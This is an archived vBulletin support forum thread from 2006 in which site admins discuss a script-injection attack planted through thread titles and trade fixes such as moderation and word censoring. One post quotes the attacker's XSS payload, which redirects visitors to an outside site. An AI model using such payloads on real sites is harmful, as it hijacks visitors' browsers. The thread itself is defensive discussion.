vb.org Archive
Page 2 of 2 1 2
Show 40 post(s) from this thread on one page

vb.org Archive (https://vborg.vbsupport.ru/index.php)
-   vB3 General Discussions (https://vborg.vbsupport.ru/forumdisplay.php?f=111)
-   -   My vbb Site getting hacked...help (https://vborg.vbsupport.ru/showthread.php?t=125713)

optrex 09-05-2006 03:19 PM
Have you let cyb know ???

TorGa3iGhT 09-05-2006 03:20 PM
i posted it in his thread....for this hack I mean...i dind't PM him or anything though

--------------
AHHHH!!! someone tried it AGAIN while i was sitting there blocking everything. luckily i disabled the plugin and nothing happened, but here's the line of text they used this time...i'm a lil scared to find out what that would have done, since it was executing a script file:

Code:
">"">>>><script>location="http://intikam.us/hck"</script> """" >

Phaedrus 09-06-2006 02:18 AM
You need to delete the Thread title when deleting the post... Edit it and make it so that the redirect isn't there anymore and this will end your admin being redirected. Somewhere you have HTML on...

roni1015 09-06-2006 01:18 PM
I've had this happen as well. What I don't understand is why people even bother doing this? It's the stupidest thing. What an enormous waste of their time to search out all these boards, register and then post this stupid title. All a person has to do is delete the stupid post and it's fixed. <sarcasm>Wow, those hackers are pretty smart, I know I'm impressed. </sarcasm> *rolling eyes* Sorry, just needed to rant there for a second about these little twits making our lives more difficult.

Anyway, I found a thread on here the other day about this where someone suggested to add that string they are using to the list of censored words and so I did that since it seemed like the quickest way to deal with this. So far, that has worked like a charm. I had one this morning actually, it ended up being a few of these ">"">> and then a whole bunch of these ************. So, it didn't work for them. Hehe.

optrex 09-06-2006 04:17 PM
Just moderate new users. They post as soon as they have activated the email, so the posts end up in a moderation queue. Then all you have to do is delete ;)

Adding words to a censored list will only stop this variant of attack, it wont stop html being used in the first place - therefore the vulnerability is still open !!!!!!

Phaedrus 09-06-2006 10:21 PM
Quote:
Originally Posted by optrex
Just moderate new users. They post as soon as they have activated the email, so the posts end up in a moderation queue. Then all you have to do is delete ;)

Adding words to a censored list will only stop this variant of attack, it wont stop html being used in the first place - therefore the vulnerability is still open !!!!!!
Or at least have it censor the carats >><<

Greek76 09-08-2006 03:16 PM
What if you add html phrases to your censors. Example maybe html, .exe, ect... That might actually work. I found the best way to stop stuff like this is set user registration to admin and pay attention to their email address if it looks fishy dont activate their account.


All times are GMT. The time now is 05:41 PM.
Page 2 of 2 1 2
Show 40 post(s) from this thread on one page

Powered by vBulletin® Version 3.8.12 by vBS
Copyright ©2000 - 2025, vBulletin Solutions Inc.

X vBulletin 3.8.12 by vBS Debug Information
  • Page Generation 0.02393 seconds
  • Memory Usage 1,727KB
  • Queries Executed 10 (?)
More Information
Template Usage:
  • (1)ad_footer_end
  • (1)ad_footer_start
  • (1)ad_header_end
  • (1)ad_header_logo
  • (1)ad_navbar_below
  • (1)bbcode_code_printable
  • (1)bbcode_quote_printable
  • (1)footer
  • (1)gobutton
  • (1)header
  • (1)headinclude
  • (6)option
  • (1)pagenav
  • (1)pagenav_curpage
  • (1)pagenav_pagelink
  • (1)post_thanks_navbar_search
  • (1)printthread
  • (7)printthreadbit
  • (1)spacer_close
  • (1)spacer_open 
Phrase Groups Available:
  • global
  • postbit
  • showthread
Included Files:
  • ./printthread.php
  • ./global.php
  • ./includes/init.php
  • ./includes/class_core.php
  • ./includes/config.php
  • ./includes/functions.php
  • ./includes/class_hook.php
  • ./includes/modsystem_functions.php
  • ./includes/class_bbcode_alt.php
  • ./includes/class_bbcode.php
  • ./includes/functions_bigthree.php 
Hooks Called:
  • init_startup
  • init_startup_session_setup_start
  • init_startup_session_setup_complete
  • cache_permissions
  • fetch_threadinfo_query
  • fetch_threadinfo
  • fetch_foruminfo
  • style_fetch
  • cache_templates
  • global_start
  • parse_templates
  • global_setup_complete
  • printthread_start
  • pagenav_page
  • pagenav_complete
  • bbcode_fetch_tags
  • bbcode_create
  • bbcode_parse_start
  • bbcode_parse_complete_precache
  • bbcode_parse_complete
  • printthread_post
  • printthread_complete